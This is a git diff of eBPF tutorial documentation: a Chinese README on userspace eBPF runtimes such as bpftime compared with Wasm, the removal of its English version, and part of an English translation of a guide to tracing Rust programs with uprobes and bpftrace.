[**Solana:**](https://solana.com/) + + Solana 利用 eBPF 实现一个 JIT (即时)编译器,这对于在其区块链网络上执行智能合约是至关重要的。使用 eBPF 确保了安全性、性能和架构中立性,从而允许在 Solana 区块链上的验证器节点上高效地执行智能合约。 + +1. 
[**eBPF for Windows (进行中的工作):**](https://github.com/microsoft/ebpf-for-windows) + + 该项目旨在将 Linux 生态系统中熟悉的 eBPF 工具链和 API 带到 Windows,允许在 Windows 之上使用现有的 eBPF 工具链。这展示了将 eBPF 的功能扩展到 Linux 之外的有前景的尝试,尽管它仍然是一个进行中的工作。 + +使用 eBPF 的这些应用的好处包括: + +- **灵活性:** eBPF 提供了一个灵活的框架,用于在内核或用户空间中运行程序,使开发人员能够扩展现有系统的功能,而无需修改其核心代码。 +- **性能:** 通过允许 JIT 编译和高效的数据包处理,eBPF 可以显著提高网络应用和区块链智能合约执行的性能。 +- **安全性和安全性:** eBPF 框架为验证程序执行前的安全属性提供了机制,从而确保了其集成的系统的完整性和安全性。 +- **跨平台能力:** eBPF 指令集的架构中立性使得跨平台兼容性成为可能,如 Solana 项目和进行中的 eBPF for Windows 所示。 + +这些属性使 eBPF 成为增强各种应用的强大工具,从网络处理到区块链智能合约执行,再到更多。还有一些论文讨论了在用户空间中使用 eBPF 的用途: + +1. [**RapidPatch: 用于实时嵌入式设备的固件热修复**](https://www.usenix.org/conference/usenixsecurity22/presentation/he-yi): + + 本文介绍了一个名为 RapidPatch 的新的热修复框架,该框架旨在通过在异构嵌入式设备上安装通用修复程序来促进修复的传播,而不会中断它们上运行的其他任务。此外,RapidPatch 提出了两种类型的 eBPF 补丁,用于不同类型的漏洞,并开发了一个 eBPF 补丁验证器以确保补丁安全。 + +2. [**Femto-Containers: 低功耗 IoT 微控制器上的小型软件功能的轻量级虚拟化和故障隔离**](https://arxiv.org/abs/2210.03432): + + 本文介绍了 Femto-Containers,这是一个新颖的框架,允许在低功耗 IoT 设备上安全地部署、执行和隔离小型虚拟软件功能。该框架在 RIOT 中实现并提供,RIOT 是一个受欢迎的开源 IoT 操作系统,强调在低功耗 IoT 设备上安全地部署、执行和隔离小型虚拟软件功能。该论文讨论了在一个常见的低功耗 IoT 操作系统 (RIOT) 中集成的 Femto-Container 主机引擎的实现,增强了其在标准的 IPv6/6LoWPAN 网络上按需启动、更新或终止 Femto-Containers 的能力。 + +这些论文深入探讨了固件补丁和轻量级虚拟化方面的相关进展,展示了针对实时嵌入式系统和低功耗 IoT 微控制器领域的关键挑战的创新。 + +## 用户空间 eBPF 运行时 vs Wasm 运行时 + +在不断发展的云原生和边缘计算领域中,eBPF (扩展的伯克利数据包过滤器) 和 Wasm (WebAssembly) 都已成为强大的工具。但它们都有自己的设计原则和权衡取舍。 + +## eBPF 在用户空间运行时 vs Wasm 运行时:云原生计算的新纪元 + +在飞速进展的云原生与边缘计算生态中,eBPF (扩展的伯克利数据包过滤器) 和 Wasm (WebAssembly) 被广泛认为是两大技术巨头。这两者虽然都非常强大,但各有其独特的设计哲学与优缺点。 + +### eBPF 与 Wasm 之间的技术差异 + +**eBPF**: + +- **核心理念**:eBPF 是为了满足高性能要求而设计的,特别是针对实时内核交互和高吞吐量的网络任务。 +- **安全性**:尽管eBPF的主要焦点是性能,但其验证器机制确保了执行的程序在不引发内核恐慌或无限循环的前提下的安全性。 + +**Wasm**: + +- **核心理念**:Wasm 诞生于网络环境,其设计重点在于可移植性和执行安全性,旨在实现接近本地机器代码的执行速度。 +- **安全性**:Wasm 的安全策略主要基于软件故障隔离 (SFI)。沙盒执行确保了代码的安全性,但这可能会带来某些运行时的额外开销。 + +这两种技术都依赖于底层的库来执行复杂任务,如 Wasm 所依赖的 `Wasi-nn` 来进行神经网络处理。与这些外部API 交互时,特别是在 Wasm 的环境下,需要进行更多的验证和运行时检查,这可能导致额外的性能损耗。而eBPF则提供了一个更为性能中心化的策略,其验证器确保了代码在主机上的安全执行,而不需要运行时的额外开销。 + +在语言支持上,由于 eBPF 的专业特性,其语言选择较为有限,通常是 C 和 Rust。而Wasm则支持更多的编程语言,包括但不限于 C、C++、Rust、Go、Python、Java和C#。这使得Wasm在跨平台部署上有更大的灵活性,但也可能因为不恰当的语言选择引入更多的性能开销。 + +为了给大家提供一个直观的对比,我们在 [https://github.com/eunomia-bpf/bpf-benchmark](https://github.com/eunomia-bpf/bpf-benchmark)中展示了eBPF和Wasm运行时的性能比较。 + +从更宏观的角度看,eBPF运行时和Wasm实际上可以被视为是相互补充的。尽管 eBPF 拥有出色的验证器机制来确保运行时安全性,但由于其编程语言的局限性和相对较高的开发难度,它并不总是适合作为业务逻辑的首选运行时。反之,eBPF 更适用于像网络流量转发、可观测性和 livepatch 这样的高专业性任务。相对而言,Wasm 运行时可以作为 Serverless 的运行时平台、插件系统和轻量级虚拟化等场景的首选。这两者都有自己的优势,但它们的选择取决于特定的用例和优先级。 + +## bpftime 快速入门 + +使用`bpftime`,您可以使用熟悉的工具(如clang和libbpf)构建eBPF应用程序,并在用户空间中执行它们。例如,`malloc` eBPF程序使用uprobe跟踪malloc调用,并使用哈希映射对其进行统计。 + +您可以参考[documents/build-and-test.md](https://eunomia.dev/bpftime/documents/build-and-test)上的构建项目的方法,或者使用来自[GitHub packages](https://github.com/eunomia-bpf/bpftime/pkgs/container/bpftime)的容器映像。 + +要开始,请构建并运行一个基于libbpf的eBPF程序,使用以下命令行: + +```console +make -C example/malloc # 构建示例的eBPF程序 +bpftime load ./example/malloc/malloc +``` + +在另一个shell中,运行带有eBPF的目标程序: + +```console +$ bpftime start ./example/malloc/victim +Hello malloc! +malloc called from pid 250215 +continue malloc... +malloc called from pid 250215 +``` + +您还可以动态地将eBPF程序附加到正在运行的进程上: + +```console +$ ./example/malloc/victim & echo $! # 进程ID为101771 +[1] 101771 +101771 +continue malloc... +continue malloc... 
+``` + +然后附加到该进程: + +```console +$ sudo bpftime attach 101771 # 您可能需要以root身份运行make install +Inject: "/root/.bpftime/libbpftime-agent.so" +成功注入。ID: 1 +``` + +您可以看到原始程序的输出: + +```console +$ bpftime load ./example/malloc/malloc +... +12:44:35 + pid=247299 malloc calls: 10 + pid=247322 malloc calls: 10 +``` + +或者,您也可以直接在内核eBPF中运行我们的示例eBPF程序,以查看类似的输出: + +```console +$ sudo example/malloc/malloc +15:38:05 + pid=30415 malloc calls: 1079 + pid=30393 malloc calls: 203 + pid=29882 malloc calls: 1076 + pid=34809 malloc calls: 8 +``` + +有关更多详细信息,请参阅[documents/usage.md](https://eunomia.dev/bpftime/documents/usage)。 + +## 总结与前景 + +用户空间的eBPF运行时正在打破边界,将eBPF的能力从内核扩展到了更广阔的领域。这种扩展带来了显著的性能、灵活性和安全性提升。例如,`bpftime`运行时显示了其在某些低级性能场景下,甚至超越了像 Wasm 这样的其他技术。也有越来越多的应用将用户空间的 eBPF 用于快速补丁、轻量级虚拟化、网络过滤等场景。 + +Wasm 的主要焦点在于可移植性、轻量级虚拟化、安全性、多语言等等,而 eBPF 则针对那些对性能有严格要求的基础设施任务提供了更多的性能优势和动态插桩特性。选择哪种技术取决于特定的需求和优先级。随着它们的进一步发展,用户空间的eBPF运行时正在成为云原生技术堆栈中的重要部分,为业界带来前所未有的安全、效率和创新的组合。 + +> 我们诚邀您深入探索用户空间eBPF的世界,您可以从我们的项目 [https://github.com/eunomia-bpf/bpftime](https://github.com/eunomia-bpf/bpftime) 开始。您的贡献、反馈或仅仅是对此工具的使用和 star,都可以为我们的社区带来巨大价值。 +> +> 若您在研究中采用了我们的`bpftime`项目,请[引用我们的仓库](https://github.com/eunomia-bpf/bpftime/blob/master/CITATION.cff)。我们期待您的宝贵意见和反馈,您可以通过 GitHub 仓库的 issue、邮箱 [yunwei356@gmail.com](mailto:yunwei356@gmail.com) 或微信 yunwei2567 与我们联系。 + +## 参考资料 + +1. bpftime: +2. ubpf: +3. rbpf: +4. Oko: +5. RapidPatch: Firmware Hotpatching for Real-Time Embedded Devices: +6. DPDK eBPF Support: +7. Solana: +8. eBPF for Windows (Work-In-Progress): +9. Femto-Containers: Lightweight Virtualization and Fault Isolation For Small Software Functions on Low-Power IoT Microcontrollers: diff --git a/src/36-userspace-ebpf/README_en.md b/src/36-userspace-ebpf/README_en.md deleted file mode 100644 index 1d5203a..0000000 --- a/src/36-userspace-ebpf/README_en.md +++ /dev/null @@ -1,218 +0,0 @@ -# Userspace eBPF Runtimes: Overview and Applications - -Yusheng Zheng - -In this blog post, we'll dive into the world of eBPF in userspace. While many are familiar with kernel-based eBPF, userspace eBPF runtimes have been making significant strides and offer compelling use cases. We will also compare userspace eBPF runtimes with Wasm runtimes, another popular technology in the cloud-native and edge computing landscape. Among these, we're excited to introduce [bpftime](https://github.com/eunomia-bpf/bpftime). Powered by an LLVM `JIT/AOT` backend, our benchmarks suggest that bpftime stands out as one of the fastest userspace eBPF runtimes available. - -## Introduction to eBPF - -### What is eBPF? - -eBPF, which stands for "extended Berkeley Packet Filter," is a revolutionary technology that facilitates the dynamic tracing and monitoring of kernel operations without modifying kernel source code or rebooting the system. Originally designed for network packet filtering, eBPF has evolved to support a wide range of applications, from performance analysis to security, making it a versatile tool in a system administrator's arsenal. - -The story of eBPF begins with the Berkeley Packet Filter (BPF), introduced in the early 1990s as a way to filter and capture network packets efficiently. Over the years, BPF proved to be an invaluable asset, but there was room for improvement. eBPF emerged as an advanced iteration of BPF, equipped with a richer instruction set and the capability to interact with kernel data structures directly. - -The Linux kernel adopted eBPF around 2014, and since then, its popularity and adoption have skyrocketed. 
Key contributors to the Linux kernel worked diligently to evolve eBPF from a simple packet filter to a generic and powerful bytecode engine. - -### Its significance in modern computing and network solutions - -In today's complex computing environments, the need for real-time data and insights is paramount. eBPF shines in this regard, allowing developers and administrators to introspect and modify system behaviors on the fly. - -Given its dynamic nature, eBPF has become a cornerstone of modern networking solutions. It enables fine-grained traffic control, load balancing, and security enforcement at the kernel level, ensuring optimal performance and security. Furthermore, in the realm of observability, eBPF provides granular insights into system calls, hardware events, and more, facilitating proactive problem detection and resolution. - -### eBPF: from kernel runtime to userspace runtime - -While the initial design of eBPF was deeply embedded within the kernel, the demand for similar functionality in userspace applications led to the evolution of userspace eBPF runtimes. These runtimes allow developers to leverage eBPF's capabilities outside the kernel, expanding its utility and applicability. Userspace eBPF runtimes make it feasible to apply eBPF's prowess to a broader set of applications, from custom network protocols to novel security solutions, further cementing eBPF's role as a transformative technology in the computing landscape. - -## Userspace eBPF Runtimes and Their Role - -### What is a userspace eBPF runtime? - -A userspace eBPF runtime provides a platform outside of the kernel to run eBPF programs. While one of eBPF's standout attributes is its capability to execute code within the kernel space, offering rapid observability and data aggregation, there are scenarios where having a userspace alternative becomes valuable. These userspace runtimes extend the reach of eBPF's versatility to areas beyond kernel integrations and often serve as experimental grounds, debugging tools, or frameworks for specific use cases. - -### Introduction to specific runtimes - -#### **ubpf** - -[uBPF](https://github.com/iovisor/ubpf) was among the early attempts to bring eBPF to the userspace. Conceived primarily as a proof-of-concept, it served as a user-space interpretation of an eBPF interpreter combined with an x86_64 and arm64 JIT. Despite its origins as an early prototype, uBPF garnered attention and was utilized as a foundation for high-performance networking projects such as DPDK and Oko. Its non-GPL licensing (Apache) makes it favorable for a wide range of projects, inclusive of proprietary ones. However, as of recent, uBPF is catching up with kernel developments, particularly with contributions from Microsoft for its eBPF Windows implementation. However, develop ubpf and rbpf programs may require a specific toolchain, which may be a barrier for some users. ubpf only have a limited hashmap implementation, which may not be enough for some users. - -#### **rbpf** - -[rbpf](https://github.com/qmonnet/rbpf) is heavily influenced by uBPF but with an emphasis on Rust, a language renowned for its memory safety guarantees. The creation of rbpf was driven by a desire to explore the intersections of eBPF and Rust. While not as widespread in adoption, notable users of rbpf include the Solana team, employing it for blockchain tools with eBPF-driven smart contracts. One of rbpf's advantages lies in its licensing (MIT), allowing for broad reuse across various projects. 
rbpf also lacks eBPF map support, and only has JIT support for x86_64. - -#### **bpftime** - -Built atop LLVM JIT/AOT, [bpftime](https://github.com/eunomia-bpf/bpftime) is a cutting-edge, high-performance eBPF runtime designed exclusively for userspace operations. It stands out with its rapid Uprobe capabilities and Syscall hooks, notably outperforming the kernel Uprobe by a tenfold margin. Additionally, bpftime offers programmatic syscall hooking, shared memory maps, and compatibility with familiar toolchains like libbpf and clang. Its design addresses some kernel eBPF limitations and outpaces plugin systems like the Wasm runtime in certain aspects. - -## Why is Having a Userspace Version of eBPF Interesting? - -eBPF, while renowned for its kernel-space operations, has observed a growing interest in its userspace adaptations. Here's why migrating eBPF to userspace is capturing the attention of technologists: - -### Enhanced Performance - -In kernel operations, the Uprobe component of eBPF is often beleaguered by performance inefficiencies, primarily due to the overheads introduced by context switches. In latency-sensitive applications, these inefficiencies can be detrimental, affecting real-time monitoring and data processing. By transitioning to userspace, eBPF can bypass these context switch related delays, leading to a more optimized performance. Runtimes like `bpftime` exemplify this, offering substantial performance improvements compared to their kernel counterparts. - -### Flexibility and Integration - -Userspace eBPF runtimes champion flexibility. Unlike some alternatives, such as the Wasm runtime, which might necessitate manual integrations, userspace eBPF provides the boon of automatic instrumentation. This means they can be seamlessly introduced into running processes without the need for cumbersome restarts or recompilations, ensuring smoother operational flows. - -### Augmented Security - -Operating in kernel mode, eBPF programs require root access, which can inadvertently expand the attack surface, making systems susceptible to vulnerabilities like container escapes or even potential kernel exploits. Userspace runtimes, however, operate outside this high-risk zone. By functioning in userspace, they demand fewer privileges, inherently reducing the potential avenues for security breaches. - -### Debugging and Licensing Flexibility - -One of the innate advantages of userspace eBPF runtimes is the ease with which developers can debug their code. The accessibility to integrate breakpoints in a userspace interpreter is a marked advantage over the relatively constrained debugging capabilities in kernel eBPF. Additionally, the licensing flexibility of userspace eBPF runtimes, typically offered under licenses like Apache or MIT, ensures they can be paired with a diverse range of projects, including proprietary ones, sidestepping the GPL constraints associated with kernel code. - -## Use Cases: Existing eBPF Userspace Applications - -Userspace eBPF is being utilized in a number of notable projects, each harnessing the unique capabilities of eBPF to enhance their functionalities. Here's how Userspace eBPF is currently utilized in various applications: - -1. [**Oko:**](https://github.com/Orange-OpenSource/Oko) - - Oko is an extension of Open vSwitch-DPDK that provides runtime extension with BPF programs. It enables the use of BPF programs to process packets in userspace, providing flexible packet processing and facilitating the integration of Open vSwitch with other systems. - -1. 
[**DPDK eBPF Support:**](https://www.dpdk.org/wp-content/uploads/sites/35/2018/10/pm-07-DPDK-BPFu6.pdf) - - The DPDK (Data Plane Development Kit) eBPF support facilitates fast packet processing by enabling the use of eBPF programs in userspace, which can be loaded and run to analyze network packets. This enhances the flexibility and programmability of network applications without requiring kernel modifications. - -1. [**Solana:**](https://solana.com/) - - Solana utilizes eBPF to implement a JIT (Just-In-Time) compiler, which is essential for executing smart contracts on its blockchain network. The use of eBPF ensures safety, performance, and architecture agnosticism, thus allowing efficient execution of smart contracts across validator nodes on the Solana blockchain. - -1. [**eBPF for Windows (Work-In-Progress):**](https://github.com/microsoft/ebpf-for-windows) - - This project is aimed at bringing the eBPF toolchains and APIs familiar in the Linux ecosystem to Windows, allowing existing eBPF toolchains to be utilized on top of Windows. This demonstrates a promising endeavor to extend the capabilities of eBPF beyond Linux, although it's still a work in progress. - -The benefits of using eBPF in these applications include: - -- **Flexibility:** eBPF provides a flexible framework for running programs in the kernel or userspace, enabling developers to extend the functionality of existing systems without modifying their core code. -- **Performance:** By allowing JIT compilation and efficient packet processing, eBPF can significantly enhance the performance of network applications and blockchain smart contract execution. -- **Safety and Security:** The eBPF framework provides mechanisms for verifying the safety properties of programs before execution, thus ensuring the integrity and security of the systems it is integrated with. -- **Cross-platform Capability:** The architecture-agnostic nature of eBPF instruction set enables cross-platform compatibility, as seen in projects like Solana and the work-in-progress eBPF for Windows. - -These attributes make eBPF a powerful tool for augmenting a variety of applications, ranging from network processing to blockchain smart contract execution, and beyond. There are also some papers that discuss the use of eBPF in userspace: - -1. [**RapidPatch: Firmware Hotpatching for Real-Time Embedded Devices**](https://www.usenix.org/conference/usenixsecurity22/presentation/he-yi): - - This paper introduces a new hotpatching framework named RapidPatch, which is designed to facilitate the propagation of patches by installing generic patches on heterogeneous embedded devices without disrupting other tasks running on them. - - Furthermore, RapidPatch proposes two types of eBPF patches for different types of vulnerabilities and develops an eBPF patch verifier to ensure patch safety. - -1. [**Femto-Containers: Lightweight Virtualization and Fault Isolation For Small Software Functions on Low-Power IoT Microcontrollers**](https://arxiv.org/abs/2210.03432): - - This paper presents Femto-Containers, a novel framework that enables the secure deployment, execution, and isolation of small virtual software functions on low-power IoT devices over a network. - - The framework is implemented and provided in RIOT, a popular open source IoT operating system, with an emphasis on secure deployment, execution, and isolation of small virtual software functions on low-power IoT devices, over the network. 
- - The paper discusses the implementation of a Femto-Container hosting engine integrated within a common low-power IoT operating system (RIOT), enhancing it with the ability to start, update, or terminate Femto-Containers on demand, securely over a standard IPv6/6LoWPAN network. - -These papers delve into pertinent advancements concerning firmware patching and lightweight virtualization, demonstrating innovations that address critical challenges in the domains of real-time embedded systems and low-power IoT microcontrollers respectively. - -## Userspace eBPF Runtime vs Wasm Runtime - -In the evolving landscape of cloud-native and edge computing, both eBPF (extended Berkeley Packet Filter) and Wasm (WebAssembly) have emerged as powerful tools. However, they come with their own set of design principles and trade-offs. - -### A Comparison of eBPF and Wasm - -**eBPF**: - -- **Philosophy**: eBPF prioritizes performance, often making it the choice for real-time kernel operations and high-throughput networking tasks. -- **Security**: While performance takes the forefront, security in eBPF is ensured through the use of a verifier, ensuring that all programs are safe to run without causing kernel panics or infinite loops. - -**Wasm**: - -- **Philosophy**: Originally designed for the web, Wasm places a higher emphasis on portability and security. It was conceived to execute code nearly as fast as running native machine code and ensures safety in hostile environments like web browsers. -- **Security**: The primary security model for Wasm revolves around Software Fault Isolation (SFI). This model guarantees safe execution by enforcing sandboxing, even though this can introduce some runtime overheads. - -For both technologies, reliance on underlying libraries for complex operations is paramount. For instance, Wasm leans on libraries like `Wasi-nn` for neural network operations. However, when interfacing with such external APIs, especially in Wasm's context, there's a need for additional validation and runtime checks, sometimes leading to substantial performance costs. eBPF, when embedded within the host, capitalizes on its verifier to ensure code safety, offering a more performance-centric approach. - -On the language support front, while eBPF's niche and specialized nature mean limited language support, Wasm boasts a broader language portfolio due to its origin and design for the web. - -## bpftime Quick Start - -With `bpftime`, you can build eBPF applications using familiar tools like clang and libbpf, and execute them in userspace. For instance, the `malloc` eBPF program traces malloc calls using uprobe and aggregates the counts using a hash map. - -You can refer to [documents/build-and-test.md](https://eunomia.dev/bpftime/documents/build-and-test) for how to build the project, or using the container images from [GitHub packages](https://github.com/eunomia-bpf/bpftime/pkgs/container/bpftime). - -To get started, you can build and run a libbpf based eBPF program starts with `bpftime` cli: - -```console -make -C example/malloc # Build the eBPF program example -bpftime load ./example/malloc/malloc -``` - -In another shell, Run the target program with eBPF inside: - -```console -$ bpftime start ./example/malloc/victim -Hello malloc! -malloc called from pid 250215 -continue malloc... -malloc called from pid 250215 -``` - -You can also dynamically attach the eBPF program with a running process: - -```console -$ ./example/malloc/victim & echo $! # The pid is 101771 -[1] 101771 -101771 -continue malloc... 
-continue malloc... -``` - -And attach to it: - -```console -$ sudo bpftime attach 101771 # You may need to run make install in root -Inject: "/root/.bpftime/libbpftime-agent.so" -Successfully injected. ID: 1 -``` - -You can see the output from original program: - -```console -$ bpftime load ./example/malloc/malloc -... -12:44:35 - pid=247299 malloc calls: 10 - pid=247322 malloc calls: 10 -``` - -Alternatively, you can also run our sample eBPF program directly in the kernel eBPF, to see the similar output: - -```console -$ sudo example/malloc/malloc -15:38:05 - pid=30415 malloc calls: 1079 - pid=30393 malloc calls: 203 - pid=29882 malloc calls: 1076 - pid=34809 malloc calls: 8 -``` - -See [documents/usage.md](https://eunomia.dev/bpftime/documents/usage) for more details. - -## Conclusion - -Userspace eBPF runtimes are an exciting development that expands the capabilities of eBPF beyond the kernel. As highlighted in this post, they offer compelling benefits like enhanced performance, flexibility, and security compared to kernel-based eBPF. Runtimes like bpftime demonstrate the potential for substantial speedups, even outperforming alternatives like Wasm runtimes in certain dimensions like low-level performance. - -With innovative frameworks like RapidPatch and Femto-Containers utilizing userspace eBPF for patching and lightweight virtualization respectively, we are witnessing pioneering use cases that address critical challenges in embedded systems and IoT domains. As eBPF continues its evolution in userspace, we can expect even more creative applications that augment everything from smart contracts to network protocols. - -While alternatives like Wasm certainly have their place with a strong emphasis on web portability and security, eBPF's specialized nature gives it an edge for performance-critical tasks. Ultimately, the choice between the two depends on the specific use case and priorities. As they continue to evolve, userspace eBPF runtimes are cementing their position as an indispensable part of the cloud-native technology stack, offering an unparalleled combination of safety, efficiency and innovation. - -> We encourage our readers to dive deep into the world of userspace eBPF, starting with our bpftime GitHub repository: Contributions, feedback, or simply using the tool can further the cause and provide invaluable insights to the community. -> -> If you use our project in research, please [cite our repo](https://github.com/eunomia-bpf/bpftime/blob/master/CITATION.cff). - -## reference - -1. bpftime: -2. ubpf: -3. rbpf: -4. Oko: -5. RapidPatch: Firmware Hotpatching for Real-Time Embedded Devices: -6. DPDK eBPF Support: -7. Solana: -8. eBPF for Windows (Work-In-Progress): -9. Femto-Containers: Lightweight Virtualization and Fault Isolation For Small Software Functions on Low-Power IoT Microcontrollers: diff --git a/src/37-uprobe-rust/README.md b/src/37-uprobe-rust/README.md index 191c3d7..991871b 100644 --- a/src/37-uprobe-rust/README.md +++ b/src/37-uprobe-rust/README.md @@ -1,30 +1,30 @@ -# eBPF 实践:使用 Uprobe 追踪用户态 Rust 应用 +# eBPF Practice: Tracing User Space Rust Applications with Uprobe -eBPF,即扩展的Berkeley包过滤器(Extended Berkeley Packet Filter),是Linux内核中的一种革命性技术,它允许开发者在内核态中运行自定义的“微程序”,从而在不修改内核代码的情况下改变系统行为或收集系统细粒度的性能数据。 +eBPF, or Extended Berkeley Packet Filter, is a revolutionary technology in the Linux kernel that allows developers to run custom "micro-programs" in kernel mode, thus changing system behavior or collecting granular performance data without modifying the kernel code. 
-本文讨论如何使用 Uprobe 和 eBPF 追踪用户态 Rust 应用,包括如何获取符号名称并 attach、获取函数参数、获取返回值等。本文是 eBPF 开发者教程的一部分,更详细的内容可以在这里找到: 源代码在 [GitHub 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial) 中开源。 +This article discusses how to trace user space Rust applications with Uprobe and eBPF, including how to obtain symbol names and attach to them, how to get function parameters, and how to get return values. This article is part of the eBPF developer tutorial; more detailed content can be found here: The source code is available in the [GitHub repository](https://github.com/eunomia-bpf/bpf-developer-tutorial). ## Uprobe -Uprobe是一种用户空间探针,uprobe探针允许在用户空间程序中动态插桩,插桩位置包括:函数入口、特定偏移处,以及函数返回处。当我们定义uprobe时,内核会在附加的指令上创建快速断点指令(x86机器上为int3指令),当程序执行到该指令时,内核将触发事件,程序陷入到内核态,并以回调函数的方式调用探针函数,执行完探针函数再返回到用户态继续执行后序的指令。 +Uprobe is a user space probe. Uprobes allow dynamic instrumentation of user space programs, with instrumentation locations including function entry points, specific offsets, and function return points. When we define a Uprobe, the kernel creates a fast breakpoint instruction (the int3 instruction on x86 machines) at the attached instruction. When the program executes this instruction, the kernel triggers an event, the program traps into kernel mode, and the probe function is called as a callback. After the probe function has executed, the program returns to user mode and continues with the subsequent instructions. -uprobe 适用于在用户态去解析一些内核态探针无法解析的流量,例如 http2 流量,https 流量,同时也可以分析程序运行时、业务逻辑等。关于 Uprobe 的更多信息,可以参考: +Uprobe is useful for parsing traffic in user space that cannot be parsed by kernel probes, such as http2 and https traffic, and it can also be used to analyze program runtime behavior, business logic, and more. For more information about Uprobe, you can refer to: -- [eBPF 实践教程:使用 uprobe 捕获多种库的 SSL/TLS 明文数据](../30-sslsniff/README.md) -- [eBPF 实践教程:使用 uprobe 捕获 Golang 的协程切换](../31-goroutine/README.md) -- [eBPF 实践教程:使用 uprobe 捕获用户态 http2 流量](../32-http2/README.md) +- [eBPF practice tutorial: Use Uprobe to capture plaintext SSL/TLS data from various libraries](../30-sslsniff/README.md) +- [eBPF practice tutorial: Use Uprobe to capture Golang coroutine switching](../31-goroutine/README.md) +- [eBPF practice tutorial: Use Uprobe to capture user space http2 traffic](../32-http2/README.md) -Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF Uprobe 程序,和内核态的 eBPF 兼容,由于避免了内核态和用户态之间的上下文切换,bpftime 的 Uprobe 开销比内核少约 10 倍,并且也更容易扩展。 +Running Uprobes in the kernel mode eBPF runtime may also introduce significant performance overhead, in which case you might consider using a user space eBPF runtime such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user-space eBPF runtime based on LLVM JIT/AOT. It can run eBPF Uprobe programs in user mode and is compatible with kernel mode eBPF. Because it avoids context switching between user and kernel modes, bpftime's Uprobe overhead is about 10 times lower than the kernel's, and it is also easier to extend. ## Rust -Rust 是一种开源的系统编程语言,注重安全、速度和并行性。它于2010年由Graydon Hoare在Mozilla研究中心开发,并于2015年发布了第一个稳定版本。Rust 语言的设计哲学旨在提供C++的性能优势,同时大幅减少内存安全漏洞。Rust在系统编程领域逐渐受到欢迎,特别是在需要高性能、安全性和可靠性的应用场景,例如操作系统、文件系统、游戏引擎、网络服务等领域。许多大型技术公司,包括Mozilla、Google、Microsoft和Amazon等,都在使用或支持Rust语言。 +Rust is an open-source systems programming language that focuses on safety, speed, and concurrency. It was developed by Graydon Hoare at the Mozilla Research Center in 2010 and released its first stable version in 2015.
The design philosophy of Rust language is to provide the performance advantages of C++ while greatly reducing memory safety vulnerabilities. Rust is gradually popular in the field of systems programming, especially in applications that require high performance, security, and reliability, such as operating systems, file systems, game engines, network services, etc. Many large technology companies, including Mozilla, Google, Microsoft, and Amazon, are using or supporting the Rust language. -可以参考 [Rust 官方网站](https://www.rust-lang.org/) 了解更多 Rust 语言的信息,并安装 Rust 的工具链。 +You can refer to the [official Rust website](https://www.rust-lang.org/) for more information about Rust language and install the Rust toolchain. -## 最简单的例子:Symbol name mangling +## Simplest example: Symbol name mangling -我们先来看一个简单的例子,使用 Uprobe 追踪 Rust 程序的 `main` 函数,代码如下: +Let's start with a simple example, tracing the `main` function of a Rust program with Uprobe, with the code as follows: ```rust pub fn hello() -> i32 { @@ -37,7 +37,7 @@ fn main() { } ``` -构建和尝试获取符号: +Build and try to get the symbol: ```console $ cd helloworld @@ -46,9 +46,9 @@ $ nm helloworld/target/release/helloworld | grep hello 0000000000008940 t _ZN10helloworld4main17h2dce92cb81426b91E ``` -我们会发现,对应的符号被转换为了 `_ZN10helloworld4main17h2dce92cb81426b91E`,这是因为 rustc 使用 [Symbol name mangling](https://en.wikipedia.org/wiki/Name_mangling) 来为代码生成过程中使用的符号编码一个唯一的名称。编码后的名称会被链接器用于将名称与所指向的内容关联起来。可以使用 -C symbol-mangling-version 选项来控制符号名称的处理方法。 +We find that the corresponding symbol has been converted to `_ZN10helloworld4main17h2dce92cb81426b91E`. This is because rustc uses [Symbol name mangling](https://en.wikipedia.org/wiki/Name_mangling) to encode a unique name for the symbols used in the code generation process. The encoded name will be used by the linker to associate the name with the content it points to. The -C symbol-mangling-version option can be used to control the handling of symbol names. -我们可以使用 [`rustfilt`](https://crates.io/crates/rustfilt) 工具来解析和获取对应的符号: +We can use the [`rustfilt`](https://crates.io/crates/rustfilt) tool to parse and obtain the corresponding symbol: ```console $ cargo install rustfilt @@ -59,7 +59,7 @@ $ rustfilt -i name.txt | grep hello 0000000000008b60 t helloworld::main ``` -接下来我们可以尝试使用 bpftrace 跟踪对应的函数: +Next we can try to use bpftrace to trace the corresponding function: ```console $ sudo bpftrace -e 'uprobe:helloworld/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called\n"); }' @@ -67,9 +67,9 @@ Attaching 1 probe... Function hello-world called ``` -## 一个奇怪的现象:多次调用、获取参数 +## A strange phenomenon: multiple calls, getting parameters -对于一个更复杂的例子,包含多次调用和获取参数: +For a more complex example, which includes multiple calls and parameter fetching: ```rust use std::env; @@ -97,7 +97,7 @@ fn main() { } ``` -我们再次进行类似的操作,会发现一个奇怪的现象: +We repeat a similar operation and notice a strange phenomenon: ```console $ sudo bpftrace -e 'uprobe:args/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called\n"); }' @@ -105,7 +105,7 @@ Attaching 1 probe... Function hello-world called ``` -这时候我们希望 hello 函数运行多次,但 bpftrace 中只输出了一次调用: +At this point we expect the hello function to run several times, but bpftrace only prints out one call: ```console $ args/target/release/helloworld 1 2 3 4 @@ -119,7 +119,7 @@ Hello, world! 
